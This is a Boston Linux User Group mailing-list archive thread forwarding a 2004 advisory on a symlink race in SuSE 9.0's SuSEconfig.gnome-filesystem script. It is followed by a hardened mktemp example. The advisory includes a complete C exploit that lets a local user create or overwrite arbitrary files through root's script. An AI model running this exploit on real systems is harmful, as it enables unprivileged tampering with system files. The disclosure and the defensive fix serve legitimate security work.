
BLU Discuss list archive



SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Have you posted this to the SuSE-e listserv?

On Tue, 13 Jan 2004 19:54:22 -0500
"D.E. Chadbourne" <235u at comcast.net> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> hi, don't know how vulnerable this may make somebody, but since some
> of you guys are into suse thought i would pass it along.  -eric.
> 
> Author: l0om <l0om at excluded.org>
> Date: 12.01.2004
> page: www.excluded.org
> 
> SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem
> 
> There is a symlink problem in the SuSEconfig.gnome-filesystem script.
> A normal user can create and overwrite every file on the system. This
> script gets executed after a configuration change by the setup tool
> YaST. So if you have installed gnome or parts of gnome, check this out.
> 
> When this script gets executed by YaST after a configuration change it
> does the following:
> 
> TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM
> mkdir $TEMP
> touch $TEMP/list
> [...]
> echo >$TEMP/found
> [...]
> 
> The env variable $RANDOM includes a random number. In my tests this
> number goes up from 1 to 33000. But also if it goes up to 65535 it is
> still vul. to a symlink attack. This is nearly as bad as the symlink
> problem which has been found on SuSE 8.2. On 8.2 a SuSEconf script has
> created a link with the $$ at the file end.
> 
> I have used a little exploit written in C which creates the directory
> "/tmp/tmp.SuSEconfig.gnome-filesystem.1" up to 33000. In every
> directory I have created a symlink to a file which I want to create or
> to overwrite. As the filename I have taken the $TEMP/found and let it
> point to some file. In my test I have taken the /etc/nologin - and hey -
> it has worked!
> 
> have phun!
> 
> 
> *******************************************************************/
> 
> #include <stdio.h>
> #include <stdlib.h>     /* exit() */
> #include <unistd.h>     /* read(), symlink() */
> #include <string.h>
> #include <sys/stat.h>   /* mkdir(), umask() */
> 
> #define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
> #define START 1
> #define END 33000
> 
> int main(int argc, char **argv)
> {
>     int i;
>     char buf[150];
> 
>     printf("\tSuSE 9.0 YaST script SuSEconfig.gnome-filesystem exploit\n");
>     printf("\t-------------------------------------------------------------\n");
>     printf("\tdiscovered and written by l0om <l0om at excluded.org>\n");
>     printf("\t WWW.EXCLUDED.ORG\n\n");
> 
>     if(argc != 2) {
>         printf("usage: %s <destination-file>\n", argv[0]);
>         exit(0xff);
>     }
> 
>     printf("### hit enter to create or overwrite file %s: ", argv[1]);
>     fflush(stdout);
>     /* wait for a keypress on stdin (fd 0) */
>     read(0, buf, 1);
> 
>     umask(0000);
>     printf("working\n\n");
>     /* one directory per possible $RANDOM value, each holding a "found" symlink */
>     for(i = START; i < END; i++) {
>         snprintf(buf, sizeof(buf), "%s%d", PATH, i);
>         if(mkdir(buf, 00777) == -1) {
>             fprintf(stderr, "cannot create directory [Nr.%d]\n", i);
>             exit(0xff);
>         }
>         if(!(i % 1000)) printf(".");
>         strcat(buf, "/found");
>         if(symlink(argv[1], buf) == -1) {
>             fprintf(stderr, "cannot create symlink from %s to %s [Nr.%d]\n",
>                     buf, argv[1], i);
>             exit(0xff);
>         }
>     }
>     printf("\ndone!\n");
>     printf("next time the SuSE.gnome-filesystem script gets executed\n");
>     printf("we will create or overwrite file %s\n", argv[1]);
>     return(0x00);
> }  /* i cant wait for the new gobbles comic!! */
> 
> - --
> Please avoid sending me Word or PowerPoint attachments.
> Plain text or OpenOffice.org attachments only.  Thanks.
> See http://www.fsf.org/philosophy/no-word-attachments.html
> SHAMELESS SELF PROMOTION at http://home.comcast.net/~235u/
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.1 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
> 
> iD8DBQFABJM9LlZzXRl+JnERArwrAKDuVnDFvR6qT/byIEIEl99x2bz0QQCgw6dM
> QFWEE8VC5InGdDRUjhDUDfk=
> =EKUw
> -----END PGP SIGNATURE-----
> 
> _______________________________________________
> Discuss mailing list
> Discuss at blu.org
> http://www.blu.org/mailman/listinfo/discuss
> 


- -- 
Jerry Feldman <gaf at blu.org>
Boston Linux and Unix user group
http://www.blu.org PGP key id:C5061EA9
PGP Key fingerprint:053C 73EC 3AC1 5C44 3E14 9245 FB00 3ED5 C506 1EA9
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2-rc1-SuSE (GNU/Linux)

iD8DBQFABUd3+wA+1cUGHqkRAn+VAJ9TqDYjmK04mlxKIvGmqvxP23cGFQCdEl2+
sRtxqmIN8tlDiXTBWRFPQws=
=qg4g
-----END PGP SIGNATURE-----
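The advisory quoted above comes down to one temp-directory idiom: a guessable name, an unchecked mkdir, and an unconditional write to $TEMP/found, which a pre-existing directory holding a symlink can redirect. As an added example, not code from the original post or from SuSE's SuSEconfig script, the shell script below places that idiom next to a hardened version built on mktemp -d and the shell's noclobber option (set -C), and exercises both inside a private sandbox directory so the constructed scenario never touches the real /tmp. The function names, the suffix 42, and the sandbox paths are assumptions made for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original post or SuSE's script): the temp-directory
# idiom quoted in the advisory next to a hardened version, exercised inside a
# private sandbox created with mktemp -d so nothing touches the real /tmp.

SANDBOX=$(mktemp -d) || exit 1
trap 'rm -rf "$SANDBOX"' EXIT

# Idiom from the advisory: guessable name, mkdir's failure ignored, then an
# unconditional write to "$TEMP/found".  If the directory already exists and
# "found" inside it is a symlink, the write follows the link.  The suffix is a
# parameter here instead of $RANDOM so the behaviour is reproducible.
insecure_tempdir() {
    TEMP="$SANDBOX/tmp.SuSEconfig.gnome-filesystem.$1"
    mkdir "$TEMP" 2>/dev/null
    echo >"$TEMP/found"
    printf '%s\n' "$TEMP"
}

# Hardened write: with noclobber the shell opens "found" with O_EXCL, so an
# existing file or a pre-planted symlink (even a dangling one) makes the
# redirection fail instead of writing through it.
safe_write_found() {
    ( set -C; echo >"$1/found" ) 2>/dev/null
}

# Hardened idiom: mktemp -d picks an unpredictable name, creates the directory
# with mode 0700 and fails instead of silently reusing an existing one.
secure_tempdir() {
    TEMP=$(mktemp -d "$SANDBOX/tmp.SuSEconfig.gnome-filesystem.XXXXXX") || return 1
    if ! safe_write_found "$TEMP"; then
        rm -rf "$TEMP"
        return 1
    fi
    printf '%s\n' "$TEMP"
}

# Helper: true only if "$1/found" is a regular file and not a symlink.
found_is_regular() {
    [ ! -L "$1/found" ] && [ -f "$1/found" ]
}

# Constructed scenario: the guessable directory already exists and contains
# a symlink named "found" pointing at a file inside the sandbox.
TARGET="$SANDBOX/target"
: >"$TARGET"
PREPLANTED="$SANDBOX/tmp.SuSEconfig.gnome-filesystem.42"
mkdir "$PREPLANTED"
ln -s "$TARGET" "$PREPLANTED/found"

if d=$(insecure_tempdir 42) && [ -L "$d/found" ] && [ -s "$TARGET" ]; then
    echo "insecure idiom reused $d and wrote through its symlink into $TARGET"
fi
if d=$(secure_tempdir) && found_is_regular "$d"; then
    echo "hardened idiom created $d holding a regular file, not a symlink"
fi
```

Two things carry over to any privileged script of this kind: let the system pick the temporary name (mktemp -d, which also refuses to reuse an existing directory) and treat a failed mkdir as a reason to stop rather than as noise. Without the second point, even a 16-bit $RANDOM suffix only costs the pre-creation of every candidate directory, which is exactly what the quoted advisory describes.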




BLU is a member of BostonUserGroups
We also thank MIT for the use of their facilities.
